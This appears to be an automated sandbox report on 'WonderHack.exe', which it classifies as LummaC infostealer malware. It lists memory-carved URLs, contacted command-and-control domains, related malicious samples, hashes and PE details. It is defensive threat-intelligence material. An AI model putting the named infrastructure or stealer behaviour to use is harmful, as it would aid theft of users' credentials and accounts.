  Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://sketchfab.com | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://www.ecosia.org/newtab/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp
https://lv.queniujq.cn | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://steamcommunity.com/profiles/76561199724331900/inventory/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | false | high
  Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp
https://www.youtube.com/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://store.steampowered.com/privacy_agreement/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://support.microsof | false | high
  Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003385000.00000004.00000800.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/css/globalv2. | false | high
  Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://www.google.com/recaptcha/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://checkout.steampowered.com/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | false | high
  Source: WonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmp
https://store.steampowered.com/; | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://store.steampowered.com/about/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://steamcommunity.com/my/wishlist/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe& | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://help.steampowered.com/en/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://steamcommunity.com/market/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp

Note: these are strings carved from process memory, so entries such as https://login.s, https://community.fastly.stP, http://store.steampowered_ and https://lev-tolstoi.com/api6M are truncated strings or strings with trailing bytes rather than distinct endpoints, and https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= is two adjacent strings read as one. The bulk of the table is page content fetched from steamcommunity.com and its CDN; the rows that matter for hunting are the lev-tolstoi.com paths and the steamcommunity.com profile URL, which both also appear in the Contacted URLs table.
                                                                                                                                                                                          https://store.steampowered.com/news/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steambroadcast.akamaized.nWonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://recaptcha.net/recaptcha/;WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/discussions/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/HUWonderHack.exe, 00000002.00000002.2585120871.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://lev-tolstoi.com/apitWonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://store.steampowered.com/stats/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://medal.tvWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://broadcast.st.dl.eccdnx.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://store.steampowered.com/steam_refunds/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://x1.c.lencr.org/0WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://x1.i.lencr.org/0WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallWonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://steamcommunity.com/workshop/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://login.steampowered.com/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
193.143.1.9 | sendypaster.xyz | unknown | 57271 | BITWEB-ASRU | true
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579560
Start date and time: 2024-12-23 00:47:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WonderHack.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/1@11/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 19
• Number of non-executed functions: 49
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                  • Execution Graph export aborted for target WonderHack.exe, PID 3696 because there are no executed function
                                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
18:48:01 | API Interceptor | 12x Sleep call for process: WonderHack.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
193.143.1.9 | Wave-Executor.exe | malicious | LummaC |
23.55.153.106 | Launcher.exe | malicious | LummaC |
23.55.153.106 | Wave-Executor.exe | malicious | LummaC |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT |
23.55.153.106 | 8ZVMneG.exe | malicious | LummaC |
23.55.153.106 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer |
23.55.153.106 | ji2xlo1f.exe | malicious | LummaC |
23.55.153.106 | Armanivenntii_crypted_EASY.exe | malicious | LummaC |
23.55.153.106 | aqbjn3fl.exe | malicious | LummaC |
23.55.153.106 | aqbjn3fl.exe | malicious | LummaC |
23.55.153.106 | zq6a1iqg.exe | malicious | LummaC Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | Launcher.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 8ZVMneG.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | ji2xlo1f.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | v_dolg.exe | malicious | LummaC Stealer | 172.67.157.254
lev-tolstoi.com | CompleteStudio.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 172.67.157.254
lev-tolstoi.com | alexshlu.exe | malicious | LummaC Stealer | 172.67.157.254
sendypaster.xyz | Wave-Executor.exe | malicious | LummaC | 193.143.1.9
steppriflej.xyz | Wave-Executor.exe | malicious | LummaC | 193.143.1.9
steamcommunity.com | Launcher.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Wave-Executor.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 23.55.153.106
steamcommunity.com | 8ZVMneG.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | qth5kdee.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | LgendPremium.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | ji2xlo1f.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | f86nrrc6.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | aqbjn3fl.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | Launcher.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | Wave-Executor.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 2.elf | malicious | Unknown | 172.237.152.235
AKAMAI-ASN1EU | mips.nn.elf | malicious | Mirai, Okiru | 23.211.121.53
AKAMAI-ASN1EU | nshkarm7.elf | malicious | Mirai | 172.233.106.253
AKAMAI-ASN1EU | nsharm7.elf | malicious | Mirai | 172.227.252.37
AKAMAI-ASN1EU | arm5.nn.elf | malicious | Mirai, Okiru | 23.215.103.199
AKAMAI-ASN1EU | nsharm.elf | malicious | Mirai | 23.1.235.104
AKAMAI-ASN1EU | nshkmips.elf | malicious | Mirai | 23.44.132.66
AKAMAI-ASN1EU | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 172.235.158.251
BITWEB-ASRU | Wave-Executor.exe | malicious | LummaC | 193.143.1.9
BITWEB-ASRU | https://mdgouv.com | malicious | HTMLPhisher | 193.143.1.14
BITWEB-ASRU | 11029977736728949.js | malicious | Strela Downloader | 193.143.1.231
BITWEB-ASRU | 11029977736728949.js | malicious | Strela Downloader | 193.143.1.231
BITWEB-ASRU | 22054200882739718047.js | malicious | Strela Downloader | 193.143.1.231
BITWEB-ASRU | 22054200882739718047.js | malicious | Strela Downloader | 193.143.1.231
BITWEB-ASRU | https://courtscali.com/ | malicious | Unknown | 193.143.1.14
BITWEB-ASRU | 18452302672446430694.js | malicious | Strela Downloader | 193.143.1.231
                                                                                                                                                                                                                                                                        18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        CLOUDFLARENETUSinstaller.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.67.164.25
                                                                                                                                                                                                                                                                        external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.19.35
                                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.151.193
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.191.144
                                                                                                                                                                                                                                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.63.229
                                                                                                                                                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 162.158.254.178
                                                                                                                                                                                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.18.182
                                                                                                                                                                                                                                                                        https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • 104.21.234.144
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context

Process: C:\Users\user\Desktop\WonderHack.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 8
Entropy (8bit): 3.0
Encrypted: false
SSDEEP: 3:OP5n:Ox
MD5: 32EB8D44A0938FBB8E8E87029CA719D8
SHA1: 13856311E78A959973D96B17544931AF22347E61
SHA-256: C769F4AA36C38983F94D6F4599EE0A3623EC8D244969B9A1E4F4B91E86C0FF9F
SHA-512: A6895D557270E69BE20349875587783B310B1B5A6922643FEA92875AD3D0899BB7B08F6F2206DE97194DA6DB9DDA1DC4AAE7759ED5684D18B36B9ECEDF0EAEDC
Malicious: false
Reputation: low
Preview: Enjoy!..

File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.527755098511334
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: WonderHack.exe
File size: 573'952 bytes
MD5: 65fc002ab58b0dc2e95e19b1f308a354
SHA1: 68ccb931b324d2988f0bad099dac28ae10dd7588
SHA256: 42c47b4221417b2f52c1e783e06d01401b8064a715eb88c54c8d00db8016a2ec
SHA512: 1cab1a0d47868c026a5cb8d4a3da1e266dba024cb88bf0baee5a018d54ce509f37179e1630ba9fdff6d770f7eb90e22614b35dd36a39c5e717cb1a1f601ae9a9
SSDEEP: 12288:DRIomkRJWzi7X+UeyZAnLoyNmOo4Lr0pfX4cR+c5JP:De/kRJWzib+UnALoyNmOo4LgdN+GJP
TLSH: 07C4D0017550C032DE6731B364AAD7AA862EFA200F636ACF97480DBDDF355D19A3172B
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.......................... .......l....@.....................................<..
                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                        Entrypoint:0x4170bb
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:1f5f01fd52677b24724028ad24992aa9
Instruction
call 00007F0B147F0A6Ah
jmp 00007F0B147F08D9h
mov ecx, dword ptr [00440700h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F0B147F0A66h
test esi, ecx
jne 00007F0B147F0A88h
call 00007F0B147F0A91h
mov ecx, eax
cmp ecx, edi
jne 00007F0B147F0A69h
mov ecx, BB40E64Fh
jmp 00007F0B147F0A70h
test esi, ecx
jne 00007F0B147F0A6Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00440700h], ecx
not ecx
pop edi
mov dword ptr [00440740h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0043D914h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0043D8CCh]
xor dword ptr [ebp-04h], eax
call dword ptr [0043D8C8h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0043D964h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00441E50h
call dword ptr [0043D93Ch]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F0B147F8098h
add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d6b4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x91000 | 0x3e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x44000 | 0x2324 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x39968 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35cf8 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3d860 | 0x170 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
